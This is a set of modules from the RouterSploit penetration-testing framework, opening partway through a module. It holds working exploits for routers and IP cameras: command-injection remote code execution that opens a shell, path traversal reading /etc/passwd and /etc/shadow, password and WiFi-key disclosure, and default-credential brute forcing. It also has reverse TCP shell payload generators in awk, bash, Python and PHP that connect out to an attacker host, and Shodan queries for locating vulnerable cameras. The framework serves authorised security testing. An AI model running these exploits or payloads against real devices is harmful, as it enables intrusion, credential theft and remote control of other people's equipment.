            print_info(self.configuration)
        else:
            print_error("Exploit failed - target does not appear vulnerable")

    @mute
    def check(self):
        for username, password in self.credentials:
            response = self.http_request(
                method="GET",
                path="/cgi-bin/users.cgi?action=getUsers",
                auth=(username, password)
            )

            if response is None:
                break

            if any([re.findall(regexp, response.text) for regexp in [r"User1.username=.*", r"User1.password=.*", r"User1.privilege=.*"]]):
                self.configuration = response.text
                return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.modules.creds.generic.http_basic_digest_default import Exploit as HTTPBasicDigestDefault


class Exploit(HTTPBasicDigestDefault):
    __info__ = {
        "name": "Asmax Router Default Web Interface Creds - HTTP Auth",
        "description": "Module performs dictionary attack against Asmax Router web interface. "
                       "If valid credentials are found, they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Asmax Router",
        ),
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(80, "Target HTTP port")
    path = OptString("/", "Target path")

    threads = OptInteger(1, "Number of threads")
    defaults = OptWordlist("admin:admin,support:support,user:user", "User:Pass or file with default credentials (file://)")



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Asmax AR 804 RCE",
        "description": "Module exploits Asmax AR 804 Remote Code Execution vulnerability which "
                       "allows executing command on operating system level with root privileges.",
        "authors": (
            "Michal Sajdak <michal.sajdak[at]securitum.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://www.securitum.pl/dh/asmax-ar-804-gu-compromise",
            "https://www.exploit-db.com/exploits/8846/",
        ),
        "devices": (
            "Asmax AR 804 gu",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        print_status("Checking if target is vulnerable")

        if self.check():
            print_success("Target is vulnerable")
            print_status("Invoking command loop...")
            shell(self, architecture="mipsbe")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    def execute(self, cmd):
        path = "/cgi-bin/script?system%20{}".format(cmd)

        response = self.http_request(
            method="GET",
            path=path,
        )
        if response is None:
            return ""

        return response.text

    @mute
    def check(self):
        cmd = "cat /etc/passwd"
        path = "/cgi-bin/script?system%20{}".format(cmd)

        response = self.http_request(
            method="GET",
            path=path,
        )
        if response is None:
            return False  # target is not vulnerable

        if response.status_code == 200 and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "WePresent WiPG-1000 RCE",
        "description": "Module exploits WePresent WiPG-1000 Command Injection vulnerability which allows "
                       "executing commands on operating system level.",
        "authors": (
            "Matthias Brun",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.redguard.ch/advisories/wepresent-wipg1000.txt",
        ),
        "devices": (
            "WePresent WiPG-1000 <=2.0.0.7",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            print_status("This is blind command injection, response is not available")
            shell(self, architecture="mipsbe", binary="netcat", shell="/bin/sh")
        else:
            print_error("Exploit failed - exploit seems to be not vulnerable")

    def execute(self, cmd):
        payload = ";{};".format(cmd)

        data = {
            "Client": payload,
            "Download": "Download"
        }

        self.http_request(
            method="POST",
            path="/cgi-bin/rdfs.cgi",
            data=data
        )

        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/rdfs.cgi"
        )

        if response is not None and "Follow administrator instructions to enter the complete path" in response.text:
            return True  # target vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-825 Path Traversal",
        "description": "Module exploits D-Link DIR-825 path traversal vulnerability, which allows reading files from the device.",
        "authors": (
            "Samuel Huntley",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/38718/",
        ),
        "devices": (
            "D-Link DIR-825",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    filename = OptString("/etc/shadow", "File to read")  # file to read
    username = OptString("admin", "Username to log in with")  # username - default: admin
    password = OptString("", "Password to log in with")  # password - default: blank

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")
            file_path = "..{}".format(self.filename)

            data = {
                "html_response_page": file_path,
                "action": "do_graph_auth",
                "login_name": "test",
                "login_pass": "test1",
                "&login_n": "test2",
                "log_pass": "test3",
                "graph_code": "63778",
                "session_id": "test5",
                "test": "test"
            }

            print_status("Sending request payload using credentials: {} / {}".format(self.username, self.password))
            response = self.http_request(
                method="POST",
                path="/apply.cgi",
                data=data,
                auth=(self.username, self.password)
            )
            if response is None:
                return

            if response.status_code == 200:
                print_status("File: {}".format(self.filename))
                print_info(response.text)
            else:
                print_error("Exploit failed - could not read response")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        data = {
            "html_response_page": "/etc/passwd",
            "action": "do_graph_auth",
            "login_name": "test",
            "login_pass": "test1",
            "&login_n": "test2",
            "log_pass": "test3",
            "graph_code": "63778",
            "session_id": "test5",
            "test": "test"
        }

        response = self.http_request(
            method="POST",
            path="/apply.cgi",
            data=data,
            auth=(self.username, self.password)
        )
        if response is None:
            return False  # target is not vulnerable

        if utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target vulnerable

        return False  # target not vulnerable



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "D-Link DIR-645 Password Disclosure",
        "description": "Module exploits D-Link DIR-645 password disclosure vulnerability.",
        "authors": (
            "Roberto Paleari <roberto[at]greyhats.it>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://packetstormsecurity.com/files/120591/dlinkdir645-bypass.txt",
        ),
        "devices": (
            "D-Link DIR-645 (Versions < 1.03)",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def run(self):
        # address and parameters
        data = {"SERVICES": "DEVICE.ACCOUNT"}

        # connection
        response = self.http_request(
            method="POST",
            path="/getcfg.php",
            data=data
        )
        if response is None:
            return

        # extracting credentials
        regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
        creds = re.findall(regular, re.sub(r'\s+', '', response.text))

        # displaying results
        if len(creds):
            print_success("Credentials found!")
            headers = ('Username', 'Password')
            creds = tuple(tuple([item[0], item[2]]) for item in creds)
            print_table(headers, *creds)
        else:
            print_error("Credentials could not be found")

    @mute
    def check(self):
        # address and parameters
        data = {"SERVICES": "DEVICE.ACCOUNT"}

        response = self.http_request(
            method="POST",
            path="/getcfg.php",
            data=data
        )
        if response is None:
            return False  # target is not vulnerable

        # extracting credentials
        regular = "<name>(.+?)</name><usrid>(|.+?)</usrid><password>(|.+?)</password>"
        creds = re.findall(regular, re.sub(r'\s+', '', response.text))

        if len(creds):
            return True  # target is vulnerable

        return False  # target is not vulnerable



import pkg_resources


defaults = 'file://' + pkg_resources.resource_filename(__name__, 'defaults.txt')
passwords = 'file://' + pkg_resources.resource_filename(__name__, 'passwords.txt')
usernames = 'file://' + pkg_resources.resource_filename(__name__, 'usernames.txt')
snmp = 'file://' + pkg_resources.resource_filename(__name__, 'snmp.txt')



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "2Wire Gateway Auth Bypass",
        "description": "Module exploits 2Wire Gateway authentication bypass vulnerability. "
                       "If the target is vulnerable link to bypass authentication is provided.",
        "authors": (
            "bugz",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/9459/",
        ),
        "devices": (
            "2Wire 2701HGV-W",
            "2Wire 3800HGV-B",
            "2Wire 3801HGV",
        ),
    }

    target = OptIP("", "Target IPv4, IPv6 address: 192.168.1.1")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        if self.check():
            print_success("Target is vulnerable")
            print_info("\nUse your browser:")
            print_info("{}:{}/xslt".format(self.target, self.port))
        else:
            print_error("Target seems to be not vulnerable")

    @mute
    def check(self):
        mark = '<form name="pagepost" method="post" action="/xslt?PAGE=WRA01_POST&amp;NEXTPAGE=WRA01_POST" id="pagepost">'

        # checking if the target is valid
        response = self.http_request(
            method="GET",
            path="/",
        )
        if response is None:
            return False  # target is not vulnerable

        if mark not in response.text:
            return False  # target is not vulnerable

        # checking if authentication can be bypassed
        response = self.http_request(
            method="GET",
            path="/xslt",
        )

        if response is None:
            return False  # target is not vulnerable

        if mark not in response.text:
            return True  # target vulnerable

        return False  # target not vulnerable



import socket
import ssl

from routersploit.core.exploit import *
from routersploit.core.tcp.tcp_client import TCPClient
from routersploit.libs.apiros.apiros_client import ApiRosClient, LoginError


class Exploit(TCPClient):
    __info__ = {
        "name": "Mikrotik Default Creds - API ROS",
        "description": "Module performs dictionary attack against Mikrotik API and API-SSL. "
                       "If valid credentials are found they are displayed to the user.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "devices": (
            "Mikrotik Router",
        )
    }

    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(8728, "Target API port")

    ssl = OptBool(False, "Use SSL for API")

    threads = OptInteger(1, "Number of threads")
    defaults = OptWordlist("admin:admin", "User:Pass or file with default credentials (file://)")
    stop_on_success = OptBool(True, "Stop on first valid authentication attempt")
    verbosity = OptBool(True, "Display authentication attempts")

    def run(self):
        self.credentials = []
        self.attack()

    @multi
    def attack(self):
        if not self.check():
            return

        print_status("Starting default creds attack")

        data = LockedIterator(self.defaults)
        self.run_threads(self.threads, self.target_function, data)

        if self.credentials:
            print_success("Credentials found!")
            headers = ("Target", "Port", "Service", "Login", "Password")
            print_table(headers, *self.credentials)
        else:
            print_error("Credentials not found")

    def login(self, username, password):
        try:
            apiros = ApiRosClient(
                address=self.target,
                port=self.port,
                user=username,
                password=password,
                use_ssl=self.ssl
            )
            apiros.open_socket()

            output = apiros.login()

            if output[0][0] == "!done":
                print_success("Authentication Succeed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
                self.credentials.append((self.target, self.port, self.target_protocol, username, password))
                apiros.close()
                return True
            else:
                print_error("Unexpected Response - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbossity)

        except LoginError:
            apiros.close()
            print_error("Authentication Failed - Username: '{}' Password: '{}'".format(username, password), verbose=self.verbosity)
        except ssl.SSLError:
            apiros.close()
            print_error("SSL Error, retrying...")
            return self.login(username, password)

        apiros.close()
        return False

    def target_function(self, running, creds):
        while running.is_set():
            username = ""
            passsword = ""
            try:
                username, password = creds.next().split(":", 1)
                if self.login(username, password) and self.stop_on_success:
                    running.clear()
            except RuntimeError:
                print_error("Connection closed by remote end")
                break

            except socket.timeout:
                print_error("Timeout waiting for the response")
                break

            except StopIteration:
                break

    def check(self):
        tcp_client = self.tcp_create()
        if tcp_client.connect():
            tcp_client.close()
            return True

        return False

    def check_default(self):
        self.credentials = []

        data = LockedIterator(self.defaults)
        self.run_threads(self.threads, self.target_function, data)

        if self.credentials:
            return self.credentials



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Awk Reverse TCP",
        "description": "Creates an interactive tcp reverse shell by using (g)awk.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    cmd = OptString("awk", "Awk binary")

    def generate(self):
        return (
            self.cmd +
            " 'BEGIN{s=\"/inet/tcp/0/" +
            "{}/{}".format(self.lhost, self.lport) +
            "\";for(;s|&getline c;close(c))" +
            "while(c|getline)print|&s;close(s)};'"
        )



from routersploit.core.exploit.exploit import (
    Exploit,
    multi,
    mute,
    LockedIterator,
)

from routersploit.core.exploit.option import (
    OptIP,
    OptPort,
    OptInteger,
    OptFloat,
    OptBool,
    OptString,
    OptMAC,
    OptWordlist,
)

from routersploit.core.exploit.printer import (
    print_info,
    print_status,
    print_success,
    print_error,
    print_table,
)

from routersploit.core.exploit import utils
from routersploit.core.exploit.shell import shell


__all__ = [
    "Exploit",
    "multi",
    "mute",
    "LockedIterator",
    "OptIP",
    "OptPort",
    "OptInteger",
    "OptFloat",
    "OptBool",
    "OptString",
    "OptMAC",
    "OptWordlist",
    "print_info",
    "print_status",
    "print_success",
    "print_error",
    "print_table",
    "utils",
    "shell",
]



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Zyxel Eir D1000 WiFi Password Disclosure",
        "description": "Module exploits WiFi Password Disclosure vulnerability in Zyxel/Eir D1000 devices. "
                       "If the target is vulnerable it allows to read WiFi password.",
        "authors": (
            "Xiphos http://www.xiphosresearch.com/",  # vulnerability discovery, poc exploit
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://github.com/XiphosResearch/exploits/tree/master/tr-06fail",
        ),
        "devices": (
            "Zyxel EIR D1000",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
    port = OptPort(7547, 'Target HTTP port')

    def run(self):
        creds = []
        password = self.get_wifi_key()

        if password is not None:
            creds.append(("WiFi Password", password))
            print_success("Target seems to be vulnerable")
            print_table(("Parameter", "Value"), *creds)
        else:
            print_error("Target seems to be not vulnerable")

    @mute
    def check(self):
        if self.get_wifi_key() is not None:
            return True  # target is vulnerable

        return False  # target is not vulnerable

    def get_wifi_key(self):
        headers = {
            "SOAPAction": "urn:dslforum-org:service:WLANConfiguration:1#GetSecurityKeys"
        }
        data = (
            "<?xml version=\"1.0\"?>"
            "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
            " <SOAP-ENV:Body>"
            "  <u:GetSecurityKeys xmlns:u=\"urn:dslforum-org:service:WLANConfiguration:1\">"
            "  </u:GetSecurityKeys>"
            " </SOAP-ENV:Body>"
            "</SOAP-ENV:Envelope>"
        )

        response = self.http_request(
            method="POST",
            path="/UD/act?1",
            headers=headers,
            data=data
        )

        if response is None:
            return None

        password = re.findall("<NewPreSharedKey>(.*?)</NewPreSharedKey>", response.text)

        if len(password):
            return password[0]

        return None



from routersploit.core.exploit import *
from routersploit.core.exploit.payloads import GenericPayload, ReverseTCPPayloadMixin


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Bash Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using bash.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    cmd = OptString("bash", "Bash binary")

    def generate(self):
        return "{} -i >& /dev/tcp/{}/{} 0>&1".format(self.cmd, self.lhost, self.lport)



from routersploit.core.exploit.exploit import BaseExploit
from routersploit.core.exploit.printer import print_error


class BaseEncoder(BaseExploit):
    architecture = None

    def __init__(self):
        self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/")

    def encode(self):
        raise NotImplementedError("Please implement 'encode()' method")

    def run(self):
        print_error("Module cannot be run")

    def __str__(self):
        return self.module_name

    def __format__(self, form):
        return format(self.module_name, form)



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Linksys WRT100/WRT110 RCE",
        "description": "Module exploits remote command execution in Linksys WRT100/WRT110 devices. "
                       "If the target is vulnerable, command loop is invoked that allows executing commands "
                       "on operating system level.",
        "authors": (
            "Craig Young",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3568",
            "http://seclists.org/bugtraq/2013/Jul/78",
        ),
        "devices": (
            "Linksys WRT100",
            "Linksys WRT110",
        )
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    username = OptString("admin", "Username to log in")
    password = OptString("admin", "Password to log in")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")

            if self.test_auth():
                print_status("Invoking command loop...")
                print_status("This is blind command injection. Response is not available.")
                shell(self, architecture="mipsle")
        else:
            print_error("Target is not vulnerable")

    def execute(self, cmd):
        payload = "& {}".format(cmd)
        data = {
            "pingstr": payload
        }

        self.http_request(
            method="POST",
            path="/ping.cgi",
            data=data,
            auth=(self.username, self.password)
        )
        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/HNAP1/"
        )

        if response is not None and "<ModelName>WRT110</ModelName>" in response.text:
            return True  # target is vulnerable

        return False  # target is not vulnerable

    def test_auth(self):
        print_status("Trying to authenticate")
        response = self.http_request(
            method="GET",
            path="/",
            auth=(self.username, self.password)
        )

        if response is None or response.status_code == 401 or response.status_code == 404:
            print_error("Could not authenticate {}:{}".format(self.username, self.password))
            return False
        else:
            print_success("Successful authentication {}:{}".format(self.username, self.password))
            return True



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Zyxel P660HN-T v1 RCE",
        "description": "Module exploits Remote Command Execution vulnerability in Zyxel P660HN-T v1 devices. "
                       "If the target is vulnerable it allows to execute commands on operating system level.",
        "authors": (
            "Pedro Ribeiro <pedrib[at]gmail.com>",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "http://seclists.org/fulldisclosure/2017/Jan/40",
            "https://raw.githubusercontent.com/pedrib/PoC/master/advisories/zyxel_trueonline.txt",
            "https://blogs.securiteam.com/index.php/archives/2910",
        ),
        "devices": (
            "Zyxel P660HN-T v1",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address: 192.168.1.1")
    port = OptPort(80, "Target port")

    def run(self):
        if self.check():
            print_success("Target appears to be vulnerable")
            print_status("Invoking command loop...")
            print_status("It is blind command injection - response is not available")
            shell(self, architecture="mipsbe")
        else:
            print_error("Target seems to be not vulnerable")

    def execute(self, cmd):
        payload = ";{};#".format(cmd)
        data = {
            "remote_submit_Flag": "1",
            "remote_syslog_Flag": "1",
            "RemoteSyslogSupported": "1",
            "LogFlag": "0",
            "remote_host": payload,
            "remoteSubmit": "Save"
        }

        self.http_request(
            method="POST",
            path="/cgi-bin/ViewLog.asp",
            data=data
        )

        return ""

    @mute
    def check(self):
        response = self.http_request(
            method="GET",
            path="/cgi-bin/authorize.asp",
        )
        if response is None:
            return False

        if "ZyXEL P-660HN-T1A" in response.text:
            return True

        return False



from routersploit.core.exploit import *
from routersploit.core.exploit import shell
from routersploit.core.exploit.option import OptIP, OptPort
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "ACTi ACM-5611 Video Camera RCE",
        "description": "Module exploits ACTi ACM-5611 Video Camera Remote Command Execution Exploit",
        "authors": (
            "Todor Donev <todor.donev@gmail.com>",  # vulnerability discovery
            "GH0st3rs",  # routersploit module
        ),
        "references": (
            "https://www.exploitalert.com/view-details.html?id=34128",
            "https://packetstormsecurity.com/files/154626/ACTi-ACM-5611-Video-Camera-Remote-Command-Execution.html",
        ),
        "devices": (
            "ACM5611-08G-X-00485",
        ),
        "search": (
            'Shodan search: title:"Web Configurator" http.html:"ACTi"',
            'Censys search: services.http.response.html_title:"Web Configurator" and services.http.response.body:"ACTi"',
            'Zoomeye search: title:"Web Configurator" +"ACTi"',
            'Fofa search title="Web Configurator" && body="ACTi"',
        )
    }
    
    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    def execute(self, cmd: str) -> str:
        response = self.http_request(
            method="GET",
            path="/cgi-bin/test",
            params={'iperf': f';{cmd}'},
            headers={"Content_Type": "application/x-www-form-urlencoded", "Referer": f'http://{self.target}:{self.port}'}
        )
        if response and response.status_code == 200:
            return response.text
        return ''

    def check(self) -> bool:
        response = self.http_request(method="GET", path="/cgi-bin/test")
        if response:
            response = self.http_request(method='GET', path='/')
            if response and 'Web Configurator' in response.text:
                return True
        return False

    def run(self):
        if self.check():
            print_success("Target seams %s:%d is vulnerable", self.target, self.port)
            shell(
                self,
                architecture="armle",
                method="wget",
                location="/var/",
                exec_binary=['chmod 777 {}', '{}']
            )
            # print_status('Target: %s:%d => output: "%s"', self.target, self.port, self.execute(self.command))
        else:
            print_error("Exploit failed - target %s:%d seems to be not vulnerable", self.target, self.port)



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Avigilon VideoIQ Camera Path Traversal",
        "description": "Module exploits Avigilon VideoIQ Camera Path Traversal vulnerability. If target is vulnerable "
                       "it is possible to read file from file system.",
        "authors": (
            "Yakir Wizman",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/40284/",
        ),
        "devices": (
            "VideoIQ Camera",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(8080, "Target HTTP port")

    filename = OptString("/etc/passwd", "File to read from filesystem")

    def run(self):
        if self.check():
            print_success("Target seems to be vulnerable")

            path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C..{}".format(self.filename)

            response = self.http_request(
                method="GET",
                path=path
            )

            if response is None:
                print_error("Exploit failed - could not read response")
                return

            print_status("Trying to read file: {}".format(self.filename))
            if any(err in response.text for err in ["Error 404 NOT_FOUND", "Problem accessing", "HTTP ERROR 404"]):
                print_status("File does not exist: {}".format(self.filename))
                return

            if response.text:
                print_info(response.text)
            else:
                print_status("File seems to be empty")
        else:
            print_error("Exploit failed - target seems to be not vulnerable")

    @mute
    def check(self):
        path = "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"

        response = self.http_request(
            method="GET",
            path=path
        )

        if response and utils.detect_file_content(response.text, "/etc/passwd"):
            return True  # target is vulnerable

        return False  # target is not vulnerable



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.python.base64 import Encoder


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "Python Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using python.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PYTHON
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "import socket,subprocess,os\n" +
            "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" +
            "s.connect(('{}',{}))\n".format(self.lhost, self.lport) +
            "os.dup2(s.fileno(),0)\n" +
            "os.dup2(s.fileno(),1)\n" +
            "os.dup2(s.fileno(),2)\n" +
            "p=subprocess.call([\"/bin/sh\",\"-i\"])"
        )



from routersploit.core.exploit.option import OptEncoder
from routersploit.core.exploit.payloads import (
    GenericPayload,
    Architectures,
    ReverseTCPPayloadMixin,
)
from routersploit.modules.encoders.php.base64 import Encoder


class Payload(ReverseTCPPayloadMixin, GenericPayload):
    __info__ = {
        "name": "PHP Reverse TCP",
        "description": "Creates interactive tcp reverse shell by using php.",
        "authors": (
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
    }

    architecture = Architectures.PHP
    encoder = OptEncoder(Encoder(), "Encoder")

    def generate(self):
        return (
            "$s=fsockopen(\"tcp://{}\",{});".format(self.lhost, self.lport) +
            "while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}"
        )



import re
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "Huawei HG530 & HG520b Password Disclosure",
        "description": "Module exploits password disclosure vulnerability in Huawei HG530 and HG520b devices. "
                       "If the target is vulnerable it allows to read credentials.",
        "authors": (
            "Fady Mohamed Osman (@fady_osman)",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/37424/",
        ),
        "devices": (
            "Huawei Home Gateway HG530",
            "Huawei Home Gateway HG520b",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        headers = {
            'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
            'Content-Type': 'text/xml; charset="utf-8"',
            'Expect': '100-continue'
        }
        data = ("<?xml version=\"1.0\"?>"
                "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
                "<s:Body>"
                "<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
                "</m:GetLoginPassword>"
                "</s:Body>"
                "</s:Envelope>")

        response = self.http_request(
            method="POST",
            path="/UD/?5",
            headers=headers,
            data=data
        )
        if response is None:
            return

        r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
        m = r.search(response.text)

        if m:
            print_success("Password has been found")
            print_info("Password: {}".format(m.group(1)))
        else:
            print_error("Exploit failed - could not find password")

    @mute
    def check(self):
        headers = {'SOAPACTION': '"urn:dslforum-org:service:UserInterface:1#GetLoginPassword"',
                   'Content-Type': 'text/xml; charset="utf-8"',
                   'Expect': '100-continue'}
        data = ("<?xml version=\"1.0\"?>"
                "<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
                "<s:Body>"
                "<m:GetLoginPassword xmlns:m=\"urn:dslforum-org:service:UserInterface:1\">"
                "</m:GetLoginPassword>"
                "</s:Body>"
                "</s:Envelope>")

        response = self.http_request(
            method="POST",
            path="/UD/?5",
            headers=headers,
            data=data
        )
        if response is None:
            return False  # target is not vulnerable

        r = re.compile('<NewUserpassword>(.*?)</NewUserpassword>')
        m = r.search(response.text)

        if m:
            return True  # target is vulnerable

        return False  # target not vulnerable



from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    __info__ = {
        "name": "3Com OfficeConnect RCE",
        "description": "Module exploits 3Com OfficeConnect remote command execution "
                       "vulnerability which allows executing command on operating system level.",
        "authors": (
            "Andrea Fabizi",  # vulnerability discovery
            "Marcin Bury <marcin[at]threat9.com>",  # routersploit module
        ),
        "references": (
            "https://www.exploit-db.com/exploits/9862/",
        ),
        "devices": (
            "3Com OfficeConnect",
        ),
    }

    target = OptIP("", "Target IPv4 or IPv6 address")
    port = OptPort(80, "Target HTTP port")

    def run(self):
        response1 = self.http_request(
            method="GET",
            path="/utility.cgi?testType=1&IP=aaa",
        )

        if response1 and response1.status_code == 200:
            path = "/{}.cgi".format(utils.random_text(32))

            response2 = self.http_request(
                method="GET",
                path=path,
            )

            if not response2 or response1.text != response2.text:
                print_success("Target appears to be vulnerable")
                print_status("Invoking command loop...")
                print_status("It is blind command injection - response is not available")
                shell(self, architecture="mipsbe")
            else:
                print_error("Exploit failed - target does not seem to be vulnerable")
        else:
            print_error("Exploit failed - target does not seem to be vulnerable")

    def execute(self, cmd):
        path = "/utility.cgi?testType=1&IP=aaa || {}".format(cmd)

        self.http_request(
            method="GET",
            path=path,
        )
        return ""

    @mute
    def check(self):
        return None  # there is no reliable way to check if target is vulnerable
